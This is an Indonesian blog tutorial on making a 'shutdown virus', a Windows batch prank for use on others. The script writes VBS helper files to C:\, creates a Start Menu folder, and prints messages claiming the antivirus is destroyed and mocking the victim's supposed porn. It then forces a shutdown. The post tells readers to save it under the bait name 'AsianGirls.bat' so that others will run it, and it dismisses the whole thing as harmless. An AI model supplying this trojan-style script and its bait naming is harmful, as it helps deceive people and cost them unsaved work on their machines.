Membuat virus shutdown



image     iseng-iseng mumpung g ad kejaan, zeydhan akan share tentang cara membuat virus sederhana yang effectnya menshutdown komputer secara otomatis,, eitsss, kalo cuma menshutdown mah udah biasa, virus yang zeydhan buat kali ini sebelum menyuruh komputer shutdown, akan menampilkan kata-kata yang isinya bahwa komputer anda telah terinfeksi virus sederhana. pokoknya seru banget, langsung aja cekidot:
copy script berikut ke notepad:
cls :A color 0a cls @echo off echo Wscript.Sleep 5000>C:\sleep5000.vbs echo Wscript.Sleep 3000>C:\sleep3000.vbs echo Wscript.Sleep 4000>C:\sleep4000.vbs echo Wscript.Sleep 2000>C:\sleep2000.vbs cd %systemroot%\System32 dir cls start /w wscript.exe C:\sleep3000.vbs echo BANGUN TIDUR KU TERUS MENGHANCURKAN SYSTEM… echo ………………… echo: echo: start /w wscript.exe C:\sleep3000.vbs echo NEXT…………! echo: echo: echo HALLO BRO echo BOLEH KENALAN GAK?? :) echo: echo: echo NAMA ANE ZEYDHAN THE TORMENTOR start /w wscript.exe C:\sleep2000.vbs echo ………… start /w wscript.exe C:\sleep4000.vbs echo ………… echo NTAR…….! start /w wscript.exe C:\sleep2000.vbs echo: echo: echo: echo VIRUS INI ADALAH VIRUS YANG SANGAT MEMATIKAN… cd C:\Documents and Settings\All Users\Start Menu\Programs\ mkdir Si_INDO_CRACKER start /w wscript.exe C:\sleep3000.vbs echo: echo: echo: echo: echo HAPPY BIRTHDAY echo HMMM, KOMPUTER KAMU BAGUS DECH :) echo BOLEH Q INTIP DIKIT echo HMM BOLEH JUGA NEH ISINYA echo WORGHHH, PARAH ENTE, BANYAK XXXnya =.=’  echo: echo: echo: echo: echo: echo SABAR YA BRO, ENTE SIH PAKE NYIMPEN YANG GITUAN,,, HARUS DI HANCURIN NIH KOMPUTERNYA… start /w wscript.exe C:\sleep3000.vbs echo ……….. echo zzzzzzz…. echo: echo: start /w wscript.exe C:\sleep3000.vbs echo OKE….Virus AKTIF! echo: echo: echo: start /w wscript.exe C:\sleep2000.vbs echo YOSH, ANTIVIRUS KAMU ANCUR… start /w wscript.exe C:\sleep2000.vbs echo SEMUA PROSESS UDAH DIBANTAI… start /w wscript.exe C:\sleep2000.vbs echo UCAPIN SELAMAT TINGGA KE KOMPUTER ENTE… start /w wscript.exe C:\sleep2000.vbs echo: echo: echo: echo VIRUS MASUK PODIUM AKHIR! start /w wscript.exe C:\sleep2000.vbs echo: echo: echo BYE BYE echo HA HA HA HA echo: echo: echo: echo: start /w wscript.exe C:\sleep2000.vbs pause shutdown -f -s -c “BERTAUBATLAH, BACK TO YOUR GOD.”
yang berwarna mewah adalah kata-kata yang akan muncul, bisa dirubah sesuai selera :)
setelah copy script diatas, buka notepad dan paste disana, setelah itu klik file>save as. pada filename isi dengan AsianGirls.bat dan pada save as type pilih all files.
ketika fileAsianGirls.bat tersebut dijalankan (di klik), maka scriptt akan berjalan dan lihat saja apa yang akan terjadi. HA HA HA HA

Note: sebenarnya cara ini adalah membuat script auto shutdown dengan sedikit modifikasi, jadi kalau di klik tidak langsung men-shutdows tetapi numcul kata-kata diatas dahulu, jadi ini 100% BUKAN VIRUS, hanya iseng semata :D

Well, sampe disini saja ya… gud luck bro :)

Berlangganan update artikel terbaru via email:

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel